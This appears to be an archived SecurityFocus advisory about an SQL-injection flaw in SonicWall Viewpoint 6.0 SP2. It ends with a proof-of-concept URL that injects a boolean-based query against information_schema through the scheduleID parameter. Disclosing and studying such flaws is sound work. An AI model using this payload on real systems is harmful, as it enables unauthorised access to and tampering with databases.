9 lines
No EOL
691 B
Text
9 lines
No EOL
691 B
Text
source: https://www.securityfocus.com/bid/49906/info
|
|
|
|
SonicWall Viewpoint is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Viewpoint 6.0 SP2 is vulnerable; other versions may also be affected.
|
|
|
|
https://www.example.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID=3%20order%20by%201,%20%28 select%20case%20when%20%281=1%29%20%20then%201%20else%201*%28select%20table_name%20from%20information_schema.tables%29end%29=1 |